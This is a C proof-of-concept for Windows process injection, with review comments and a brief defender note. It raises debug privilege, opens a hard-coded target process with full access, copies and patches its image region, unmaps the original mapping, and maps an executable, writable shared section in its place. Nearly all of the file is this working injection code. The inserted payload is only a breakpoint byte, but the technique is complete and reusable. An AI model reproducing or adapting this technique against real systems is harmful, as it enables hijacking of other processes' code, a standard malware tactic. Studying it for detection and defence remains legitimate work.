#include <windows.h>
#include <stdio.h>
#include <Tlhelp32.h>
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// REF : http://blog.w4kfu.com/post/new_method_of_injection
void EnableDebugPrivilege() {
    // Enable SeDebugPrivilege on the calling process's own token.
    // Every failure is only reported on stdout; the remaining calls still run,
    // so 'token' is passed on uninitialised when OpenProcessToken fails.
    // NOTE(review): GetLastError is never consulted after AdjustTokenPrivileges,
    // so a TRUE return here does not by itself prove the privilege was granted.
    HANDLE token;
    LUID debugLuid;
    TOKEN_PRIVILEGES request;

    BOOL opened = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token);
    if (!opened) {
        puts("Error OPT");
    }

    BOOL resolved = LookupPrivilegeValueA(NULL, SE_DEBUG_NAME, &debugLuid);
    if (!resolved) {
        puts("Error LPV");
    }

    request.PrivilegeCount = 1;
    request.Privileges[0].Luid = debugLuid;
    request.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL adjusted = AdjustTokenPrivileges(token, FALSE, &request, sizeof request, NULL, NULL);
    if (!adjusted) {
        puts("Error APT");
    }

    CloseHandle(token);
}
int main(int argc, char** argv)
{
// Entry point of the PoC. It copies 0x6000 bytes from address 0x400000 in a
// hard-coded target process (pid 0x31c) into a locally created
// PAGE_EXECUTE_READWRITE section, patches one byte of that copy, unmaps the
// target's original region at 0x400000 and maps the section view there instead.
// argc/argv are not used: the pid, address and size are all constants below.
// The 0x400000 base and __stdcall suggest a 32-bit build — not confirmed here.
//
// Function-pointer declarations for the three ntdll exports resolved at runtime.
NTSTATUS (__stdcall *ZwMapViewOfSection) (
HANDLE SectionHandle,
HANDLE ProcessHandle,
OUT PVOID *BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
DWORD InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
NTSTATUS (__stdcall *ZwCreateSection)(
PHANDLE SectionHandle,
ACCESS_MASK DesiredAccess,
PDWORD ObjectAttributes OPTIONAL,
PLARGE_INTEGER MaximumSize OPTIONAL,
ULONG SectionPageProtection,
ULONG AllocationAttributes,
HANDLE FileHandle OPTIONAL
);
NTSTATUS (__stdcall *ZwUnmapViewOfSection)(
HANDLE ProcessHandle,
PVOID BaseAddress
);
// tid is declared but never used.
DWORD pid, tid;
// zone: heap copy of the target's image region (never freed; the process exits).
PVOID zone;
// hsect: section handle from ZwCreateSection (never closed).
HANDLE hsect;
// a: MaximumSize of the section, 0x6000 bytes.
LARGE_INTEGER a;
a.HighPart = 0;
a.LowPart = 0x6000;
// size serves two roles: ReadProcessMemory writes the bytes actually read into
// it, and the same variable is then passed as ViewSize to both
// ZwMapViewOfSection calls, so the view size follows the read count.
SIZE_T size;
size = 0x6000;
// 0 lets the kernel choose where the local view is placed; later the variable
// is reassigned to the target's fixed image base.
PVOID BaseAddress = (PVOID)0;
HANDLE hproc;
NTSTATUS stat;
// Resolve the Zw* exports from ntdll. The casts spell NTSTATUS as 'long',
// which is what the LONG typedef behind NTSTATUS resolves to.
ZwMapViewOfSection = (long (__stdcall *)(HANDLE,HANDLE,PVOID *,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection");
ZwCreateSection = (long (__stdcall *)(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection");
ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE,PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUnmapViewOfSection");
// The malloc result is never checked.
zone = malloc(0x6000);
// Enables SeDebugPrivilege on our token — presumably so the OpenProcess call
// below succeeds on the target; the helper itself does not report success.
EnableDebugPrivilege();
if(!ZwMapViewOfSection || !ZwCreateSection || !ZwUnmapViewOfSection)
{
printf("GetProcAddr fail.\n");
return 1;
}
// Target pid is a compile-time constant, not taken from argv.
pid = 0x31c;
hproc=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if(hproc == NULL)
{
printf("OpenProc %x fail.\n",GetLastError());
return 1;
}
// Copy 0x6000 bytes starting at the target's 0x400000 into zone. The BOOL
// result is ignored; on return 'size' holds the byte count actually read.
ReadProcessMemory(hproc,(PVOID)0x400000,zone, 0x6000, &size);
// create the 0x6000-byte section in our process
// (no ObjectAttributes, no backing file: an anonymous committed RWX section)
stat = ZwCreateSection(&hsect,SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if(stat !=STATUS_SUCCESS)
{
printf("ZwCreateSection %x fail.\n",stat);
return 1;
}
// map the section into our process
// (ZeroBits, CommitSize, SectionOffset and AllocationType are passed as
// NULL/0; InheritDisposition 1 is ViewShare; BaseAddress receives the view
// address chosen by the kernel)
stat = ZwMapViewOfSection(hsect,GetCurrentProcess(),&BaseAddress,NULL,NULL,NULL,&size,1,NULL,PAGE_EXECUTE_READWRITE);
if(stat !=STATUS_SUCCESS)
{
printf("ZwMapViewOfSection %x fail.\n",stat);
return 1;
}
// now modify it with our data: write a single 0xCC (x86 int3) at offset
// 0x1018 of the copied image, then copy the whole 0x6000-byte buffer into
// the local view of the section. The local view is never unmapped afterwards.
*((PBYTE)zone+0x1018) = 0xCC;
memcpy(BaseAddress,zone,0x6000);
// unmap the old region in the other process
// BaseAddress is reused here: it now names the target's image base to unmap,
// and below the fixed address at which the section view must be mapped.
BaseAddress = (PVOID)0x00400000;
stat = ZwUnmapViewOfSection(hproc, BaseAddress);
if(stat != STATUS_SUCCESS)
{
printf("ZwUnmapViewOfSection %x fail.\n",stat);
return 1;
}
// map our region into the new process :)
// Defender note: after this call the target's region at 0x00400000 is no
// longer its original image mapping but a PAGE_EXECUTE_READWRITE section view
// shared with this process; inspecting the target's memory regions and their
// protections would show that state. hproc and hsect are never closed.
stat = ZwMapViewOfSection(hsect, hproc, &BaseAddress, NULL, NULL, NULL, &size, 1, NULL, PAGE_EXECUTE_READWRITE);
if(stat !=STATUS_SUCCESS)
{
printf("ZwMapViewOfSection %x fail.\n",stat);
return 1;
}
return 0;
}